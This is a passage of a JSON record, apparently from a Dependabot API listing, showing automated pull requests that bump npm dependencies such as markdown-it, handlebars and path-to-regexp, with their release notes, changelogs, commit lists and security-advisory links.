\u003ccode\u003eprepublish\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `gatsby` from 4.23.1 to 4.25.9\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/gatsbyjs/gatsby/releases\"\u003egatsby's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003egatsby-source-wordpress@7.13.5 and 6 more...\u003c/h2\u003e\n\u003cp\u003e2024-08-26\u003c/p\u003e\n\u003ch2\u003eUpdated packages\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003egatsby-source-wordpress@7.13.5\u003c/li\u003e\n\u003cli\u003egatsby-remark-responsive-iframe@6.13.2\u003c/li\u003e\n\u003cli\u003egatsby-remark-prismjs@7.13.2\u003c/li\u003e\n\u003cli\u003egatsby-remark-images@7.13.2\u003c/li\u003e\n\u003cli\u003egatsby-remark-images@6.13.2\u003c/li\u003e\n\u003cli\u003egatsby-remark-graphviz@5.13.2\u003c/li\u003e\n\u003cli\u003egatsby-remark-copy-linked-files@6.13.2\u003c/li\u003e\n\u003cli\u003egatsby-plugin-offline@6.13.3\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: pin cheerio (\u003ca href=\"https://redirect.github.com/gatsbyjs/gatsby/issues/39066\"\u003e#39066\u003c/a\u003e) by \u003ca href=\"https://github.com/gatsbybot\"\u003e\u003ccode\u003e@​gatsbybot\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"...\n\n_Description has been truncated_","html_url":"https://github.com/iDereje/badges/pull/14","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/iDereje%2Fbadges/issues/14","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/14/packages"},{"uuid":"4180930909","node_id":"PR_kwDORikVvM7PA7Eh","number":23,"state":"closed","title":"chore(deps): bump the npm_and_yarn group across 8 directories with 17 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-04-01T16:44:14.000Z","author_association":null,"state_reason":null,"created_at":"2026-03-31T17:17:12.000Z","updated_at":"2026-04-01T16:44:16.000Z","time_to_close":84422,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"npm_and_yarn","update_count":17,"packages":[{"name":"markdown-it","old_version":"13.0.2","new_version":"14.1.1","repository_url":"https://github.com/markdown-it/markdown-it"},{"name":"handlebars","old_version":"4.7.7","new_version":"4.7.9","repository_url":"https://github.com/handlebars-lang/handlebars.js"},{"name":"path-to-regexp","old_version":"8.2.0","new_version":"8.4.0","repository_url":"https://github.com/pillarjs/path-to-regexp"},{"name":"yaml","old_version":"1.10.2","new_version":"1.10.3","repository_url":"https://github.com/eemeli/yaml"},{"name":"@apollo/server","old_version":"4.13.0","new_version":"5.5.0","repository_url":"https://github.com/apollographql/apollo-server"},{"name":"nodemailer","old_version":"8.0.1","new_version":"8.0.4","repository_url":"https://github.com/nodemailer/nodemailer"},{"name":"simple-git","old_version":"3.21.0","new_version":"3.32.3","repository_url":"https://github.com/steveukx/git-js"},{"name":"@octokit/plugin-paginate-rest","old_version":"9.2.1","new_version":"9.2.2","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"},{"name":"bn.js","old_version":"4.12.0","new_version":"4.12.3","repository_url":"https://github.com/indutny/bn.js"},{"name":"brace-expansion","old_version":"1.1.11","new_version":"1.1.13","repository_url":"https://github.com/juliangruber/brace-expansion"},{"name":"ejs","old_version":"3.1.9","new_version":"3.1.10","repository_url":"https://github.com/mde/ejs"},{"name":"picomatch","old_version":"2.3.1","new_version":"2.3.2","repository_url":"https://github.com/micromatch/picomatch"},{"name":"yauzl","old_version":"3.2.0","new_version":"3.2.1","repository_url":"https://github.com/thejoshwolfe/yauzl"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 13 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [markdown-it](https://github.com/markdown-it/markdown-it) | `13.0.2` | `14.1.1` |\n| [handlebars](https://github.com/handlebars-lang/handlebars.js) | `4.7.7` | `4.7.9` |\n| [path-to-regexp](https://github.com/pillarjs/path-to-regexp) | `8.2.0` | `8.4.0` |\n| [yaml](https://github.com/eemeli/yaml) | `1.10.2` | `1.10.3` |\n| [@apollo/server](https://github.com/apollographql/apollo-server/tree/HEAD/packages/server) | `4.13.0` | `5.5.0` |\n| [nodemailer](https://github.com/nodemailer/nodemailer) | `8.0.1` | `8.0.4` |\n| [simple-git](https://github.com/steveukx/git-js/tree/HEAD/simple-git) | `3.21.0` | `3.32.3` |\n| [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js) | `9.2.1` | `9.2.2` |\n| [bn.js](https://github.com/indutny/bn.js) | `4.12.0` | `4.12.3` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.11` | `1.1.13` |\n| [ejs](https://github.com/mde/ejs) | `3.1.9` | `3.1.10` |\n| [picomatch](https://github.com/micromatch/picomatch) | `2.3.1` | `2.3.2` |\n| [yauzl](https://github.com/thejoshwolfe/yauzl) | `3.2.0` | `3.2.1` |\n\nBumps the npm_and_yarn group with 8 updates in the /docs directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [glob](https://github.com/isaacs/node-glob) | `10.4.5` | `10.5.0` |\n| [tar](https://github.com/isaacs/node-tar) | `7.4.3` | `7.5.13` |\n| [ws](https://github.com/websockets/ws) | `7.5.8` | `7.5.10` |\n| [handlebars](https://github.com/handlebars-lang/handlebars.js) | `4.7.8` | `4.7.9` |\n| [path-to-regexp](https://github.com/pillarjs/path-to-regexp) | `0.1.12` | `0.1.13` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.12` | `1.1.13` |\n| [follow-redirects](https://github.com/follow-redirects/follow-redirects) | `1.15.1` | `1.15.11` |\n| [picomatch](https://github.com/micromatch/picomatch) | `2.3.1` | `2.3.2` |\n\nBumps the npm_and_yarn group with 1 update in the /packages/core/content-manager directory: [markdown-it](https://github.com/markdown-it/markdown-it).\nBumps the npm_and_yarn group with 1 update in the /packages/generators/generators directory: [handlebars](https://github.com/handlebars-lang/handlebars.js).\nBumps the npm_and_yarn group with 2 updates in the /packages/plugins/documentation directory: [path-to-regexp](https://github.com/pillarjs/path-to-regexp) and [yaml](https://github.com/eemeli/yaml).\nBumps the npm_and_yarn group with 1 update in the /packages/plugins/graphql directory: [@apollo/server](https://github.com/apollographql/apollo-server/tree/HEAD/packages/server).\nBumps the npm_and_yarn group with 1 update in the /packages/providers/email-nodemailer directory: [nodemailer](https://github.com/nodemailer/nodemailer).\nBumps the npm_and_yarn group with 1 update in the /packages/utils/upgrade directory: [simple-git](https://github.com/steveukx/git-js/tree/HEAD/simple-git).\n\nUpdates `markdown-it` from 13.0.2 to 14.1.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/markdown-it/markdown-it/blob/master/CHANGELOG.md\"\u003emarkdown-it's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[14.1.1] - 2026-01-11\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixed regression from v13 in linkify inline rule. Specific patterns could\ncause high CPU use. Thanks to \u003ca href=\"https://github.com/ltduc147\"\u003e\u003ccode\u003e@​ltduc147\u003c/code\u003e\u003c/a\u003e for report.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[14.1.0] - 2024-03-19\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated CM spec compatibility to 0.31.2, \u003ca href=\"https://redirect.github.com/markdown-it/markdown-it/issues/1009\"\u003e#1009\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixed quadratic complexity when parsing references, \u003ca href=\"https://redirect.github.com/markdown-it/markdown-it/issues/996\"\u003e#996\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eFixed quadratic output size with pathological user input in tables, \u003ca href=\"https://redirect.github.com/markdown-it/markdown-it/issues/1000\"\u003e#1000\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[14.0.0] - 2023-12-08\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eDrop ancient browsers support (use \u003ccode\u003e.fromCodePoint\u003c/code\u003e and other features).\u003c/li\u003e\n\u003cli\u003eRewrite to ESM (including all plugins/deps). CJS fallback still available.\nNo signatures changed, except \u003ccode\u003emarkdown-it-emoji\u003c/code\u003e plugin.\u003c/li\u003e\n\u003cli\u003eDropped \u003ccode\u003edist/\u003c/code\u003e folder from repo, build on package publish.\u003c/li\u003e\n\u003cli\u003eSet \u003ccode\u003epunicode.js\u003c/code\u003e as external dependency.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eHtml tokens inside img alt are now rendered as their original text, \u003ca href=\"https://redirect.github.com/markdown-it/markdown-it/issues/896\"\u003e#896\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eHardbreaks inside img alt are now rendered as newlines.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/b4a9b659ef5734223731cfaa3ad5eacc6fc22918\"\u003e\u003ccode\u003eb4a9b65\u003c/code\u003e\u003c/a\u003e 14.1.1 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/4b4bbcae5e0990a5b172378e507b33a59012ed26\"\u003e\u003ccode\u003e4b4bbca\u003c/code\u003e\u003c/a\u003e Fixed perf regression in linkify-it wrapper\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/d2782d892a51201b25d3eeab172201ad5a53a24c\"\u003e\u003ccode\u003ed2782d8\u003c/code\u003e\u003c/a\u003e Add supplementary example-driven documentation (\u003ca href=\"https://redirect.github.com/markdown-it/markdown-it/issues/1092\"\u003e#1092\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/0fe7ccb4b7f30236fb05f623be6924961d296d3d\"\u003e\u003ccode\u003e0fe7ccb\u003c/code\u003e\u003c/a\u003e 14.1.0 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/a367c44154d6c906c8652ed779af6a21f7eaed2e\"\u003e\u003ccode\u003ea367c44\u003c/code\u003e\u003c/a\u003e Fix typo in comments of text.mjs (\u003ca href=\"https://redirect.github.com/markdown-it/markdown-it/issues/1015\"\u003e#1015\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/7ad81799725ef19627241f002fb1fa9cbd6a2a37\"\u003e\u003ccode\u003e7ad8179\u003c/code\u003e\u003c/a\u003e add changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/5e900639542bb36501ee9e960c07bfaa529431c9\"\u003e\u003ccode\u003e5e90063\u003c/code\u003e\u003c/a\u003e simplify logic in scanDelims\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/d7ce5ec66d3babcd165d432b68b3c55000349ccf\"\u003e\u003ccode\u003ed7ce5ec\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/markdown-it/markdown-it/issues/1009\"\u003e#1009\u003c/a\u003e from notriddle/spec-0.31.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/0bfc57de427b349865c4d85dccc7d4da00bca53f\"\u003e\u003ccode\u003e0bfc57d\u003c/code\u003e\u003c/a\u003e Update spec to 0.31.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/cd2477863fdcc182cc8739e9bedc7363acb344d8\"\u003e\u003ccode\u003ecd24778\u003c/code\u003e\u003c/a\u003e Update to comply with spec 0.31.2\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/markdown-it/markdown-it/compare/13.0.2...14.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `handlebars` from 4.7.7 to 4.7.9\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/handlebars-lang/handlebars.js/releases\"\u003ehandlebars's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.7.9\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: enable shell mode for spawn to resolve Windows EINVAL issue - e0137c2\u003c/li\u003e\n\u003cli\u003efix type \u0026quot;RuntimeOptions\u0026quot; also accepting string partials - eab1d14\u003c/li\u003e\n\u003cli\u003efeat(types): set \u003ccode\u003ehash\u003c/code\u003e to be a \u003ccode\u003eRecord\u0026lt;string, any\u0026gt;\u003c/code\u003e - de4414d\u003c/li\u003e\n\u003cli\u003efix non-contiguous program indices - 4512766\u003c/li\u003e\n\u003cli\u003erefactor: rename i to startPartIndex - e497a35\u003c/li\u003e\n\u003cli\u003esecurity: fix security issues - 68d8df5\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-2w6w-674q-4c4q\"\u003ehttps://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-2w6w-674q-4c4q\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-3mfm-83xf-c92r\"\u003ehttps://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-3mfm-83xf-c92r\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-xhpv-hc6g-r9c6\"\u003ehttps://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-xhpv-hc6g-r9c6\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-xjpj-3mr7-gcpf\"\u003ehttps://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-xjpj-3mr7-gcpf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-9cx6-37pm-9jff\"\u003ehttps://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-9cx6-37pm-9jff\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-2qvq-rjwj-gvw9\"\u003ehttps://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-2qvq-rjwj-gvw9\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-7rx3-28cr-v5wh\"\u003ehttps://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-7rx3-28cr-v5wh\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-442j-39wm-28r2\"\u003ehttps://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-442j-39wm-28r2\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/compare/v4.7.8...v4.7.9\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev4.7.8\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMake library compatible with workers (\u003ca href=\"https://redirect.github.com/handlebars-lang/handlebars.js/issues/1894\"\u003e#1894\u003c/a\u003e) - 3d3796c\u003c/li\u003e\n\u003cli\u003eDon't rely on Node.js global object (\u003ca href=\"https://redirect.github.com/handlebars-lang/handlebars.js/issues/1776\"\u003e#1776\u003c/a\u003e) - 2954e7e\u003c/li\u003e\n\u003cli\u003eFix compiling of each block params in strict mode (\u003ca href=\"https://redirect.github.com/handlebars-lang/handlebars.js/issues/1855\"\u003e#1855\u003c/a\u003e) - 30dbf04\u003c/li\u003e\n\u003cli\u003eFix rollup warning when importing Handlebars as ESM - 03d387b\u003c/li\u003e\n\u003cli\u003eFix bundler issue with webpack 5 (\u003ca href=\"https://redirect.github.com/handlebars-lang/handlebars.js/issues/1862\"\u003e#1862\u003c/a\u003e) - c6c6bbb\u003c/li\u003e\n\u003cli\u003eUse https instead of git for mustache submodule - 88ac068\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/compare/v4.7.7...v4.7.8\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/handlebars-lang/handlebars.js/blob/v4.7.9/release-notes.md\"\u003ehandlebars's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.7.9 - March 26th, 2026\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: enable shell mode for spawn to resolve Windows EINVAL issue - e0137c2\u003c/li\u003e\n\u003cli\u003efix type \u0026quot;RuntimeOptions\u0026quot; also accepting string partials - eab1d14\u003c/li\u003e\n\u003cli\u003efeat(types): set \u003ccode\u003ehash\u003c/code\u003e to be a \u003ccode\u003eRecord\u0026lt;string, any\u0026gt;\u003c/code\u003e - de4414d\u003c/li\u003e\n\u003cli\u003efix non-contiguous program indices - 4512766\u003c/li\u003e\n\u003cli\u003erefactor: rename i to startPartIndex - e497a35\u003c/li\u003e\n\u003cli\u003esecurity: fix security issues - 68d8df5\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/compare/v4.7.8...v4.7.9\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev4.7.8 - July 27th, 2023\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMake library compatible with workers (\u003ca href=\"https://redirect.github.com/handlebars-lang/handlebars.js/issues/1894\"\u003e#1894\u003c/a\u003e) - 3d3796c\u003c/li\u003e\n\u003cli\u003eDon't rely on Node.js global object (\u003ca href=\"https://redirect.github.com/handlebars-lang/handlebars.js/issues/1776\"\u003e#1776\u003c/a\u003e) - 2954e7e\u003c/li\u003e\n\u003cli\u003eFix compiling of each block params in strict mode (\u003ca href=\"https://redirect.github.com/handlebars-lang/handlebars.js/issues/1855\"\u003e#1855\u003c/a\u003e) - 30dbf04\u003c/li\u003e\n\u003cli\u003eFix rollup warning when importing Handlebars as ESM - 03d387b\u003c/li\u003e\n\u003cli\u003eFix bundler issue with webpack 5 (\u003ca href=\"https://redirect.github.com/handlebars-lang/handlebars.js/issues/1862\"\u003e#1862\u003c/a\u003e) - c6c6bbb\u003c/li\u003e\n\u003cli\u003eUse https instead of git for mustache submodule - 88ac068\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/compare/v4.7.7...v4.7.8\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/dce542c9a660048d31f0981ac8a45c08b919bddb\"\u003e\u003ccode\u003edce542c\u003c/code\u003e\u003c/a\u003e v4.7.9\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/8a41389ba5b2624b6f43a5463d8e2533b843a562\"\u003e\u003ccode\u003e8a41389\u003c/code\u003e\u003c/a\u003e Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2\"\u003e\u003ccode\u003e68d8df5\u003c/code\u003e\u003c/a\u003e Fix security issues\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/b2a083136b11e1da9f0f47a11f749a9830a49328\"\u003e\u003ccode\u003eb2a0831\u003c/code\u003e\u003c/a\u003e Fix browser tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/9f98c1629834abf8de5a127caff8a2eab03d2c12\"\u003e\u003ccode\u003e9f98c16\u003c/code\u003e\u003c/a\u003e Fix release script\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/45443b4290475dfb7cec32a85d344f12ab345eb9\"\u003e\u003ccode\u003e45443b4\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;Improve partial indenting performance\u0026quot;\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/8841a5f6d35096aee95d68e1e49636a4cb5c661e\"\u003e\u003ccode\u003e8841a5f\u003c/code\u003e\u003c/a\u003e Fix CI errors with linting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/e0137c26f2202593bca7cc25184e733e87d54709\"\u003e\u003ccode\u003ee0137c2\u003c/code\u003e\u003c/a\u003e fix: enable shell mode for spawn to resolve Windows EINVAL issue\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/e914d6037ffb0dd371f7e4823cdb019732ae66d7\"\u003e\u003ccode\u003ee914d60\u003c/code\u003e\u003c/a\u003e Improve rendering performance\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/handlebars-lang/handlebars.js/commit/7de4b41c344a5d702edca93d1841b59642fa32bd\"\u003e\u003ccode\u003e7de4b41\u003c/code\u003e\u003c/a\u003e Upgrade GitHub Actions checkout and setup-node on 4.x branch\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/handlebars-lang/handlebars.js/compare/v4.7.7...v4.7.9\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~jaylinski\"\u003ejaylinski\u003c/a\u003e, a new releaser for handlebars since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `path-to-regexp` from 8.2.0 to 8.4.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pillarjs/path-to-regexp/releases\"\u003epath-to-regexp's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.4.0\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eImportant\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2026-4926\"\u003eCVE-2026-4926\u003c/a\u003e (\u003ca href=\"https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-j3q9-mxjg-w52f\"\u003eGHSA-j3q9-mxjg-w52f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2026-4923\"\u003eCVE-2026-4923\u003c/a\u003e (\u003ca href=\"https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-27v5-c462-wpq7\"\u003eGHSA-27v5-c462-wpq7\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFixed\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eRestricts wildcard backtracking when using more than 1 in a path (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/pull/421\"\u003epillarjs/path-to-regexp#421\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eChanged\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDedupes regex prefixes (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/pull/422\"\u003epillarjs/path-to-regexp#422\u003c/a\u003e)\n\u003cul\u003e\n\u003cli\u003eThis will result in shorter regular expressions for some cases using optional groups\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eRejects large optional route combinations (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/pull/424\"\u003epillarjs/path-to-regexp#424\u003c/a\u003e)\n\u003cul\u003e\n\u003cli\u003eWhen using groups such as \u003ccode\u003e/users{/delete}\u003c/code\u003e it will restrict the number of generated combinations to \u0026lt; 256, equivalent to 8 top-level optional groups and unlikely to occur in a real world application, but avoids exploding the regex size for applications that accept user created routes\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.3.0\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eChanged\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd custom error class (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/398\"\u003e#398\u003c/a\u003e)  2a7f2a4\u003c/li\u003e\n\u003cli\u003eAllow plain objects for \u003ccode\u003eTokenData\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/391\"\u003e#391\u003c/a\u003e)  687a9bb\u003c/li\u003e\n\u003cli\u003eEscape text should escape backslash (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/390\"\u003e#390\u003c/a\u003e)  a4a8552\u003c/li\u003e\n\u003cli\u003eImproved error messages and stack size (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/363\"\u003e#363\u003c/a\u003e)  a6bdf40\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eOther\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eMinifying the parser\n\u003cul\u003e\n\u003cli\u003ePR (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/401\"\u003e#401\u003c/a\u003e)  9df2448\u003c/li\u003e\n\u003cli\u003ePR (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/395\"\u003e#395\u003c/a\u003e)  4a91505\u003c/li\u003e\n\u003cli\u003eShaving some bytes  d63f44b\u003c/li\u003e\n\u003cli\u003eRemove optional operator  973d15c\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v8.2.0...v8.3.0\"\u003ehttps://github.com/pillarjs/path-to-regexp/compare/v8.2.0...v8.3.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/34cb451ddaeea4783a2fe60579ffb3e4ccfc73a7\"\u003e\u003ccode\u003e34cb451\u003c/code\u003e\u003c/a\u003e 8.4.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/22a967901afc8b2b42eefe456faa7b6773dcc415\"\u003e\u003ccode\u003e22a9679\u003c/code\u003e\u003c/a\u003e Reject large optional route combinations (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/424\"\u003e#424\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/8881a88930cf96ebaa00412a8e87cdd601bb3f3d\"\u003e\u003ccode\u003e8881a88\u003c/code\u003e\u003c/a\u003e Byte optimization (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/423\"\u003e#423\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/43669ac637fe70fad33693d145a74d98179152ce\"\u003e\u003ccode\u003e43669ac\u003c/code\u003e\u003c/a\u003e Dedupe 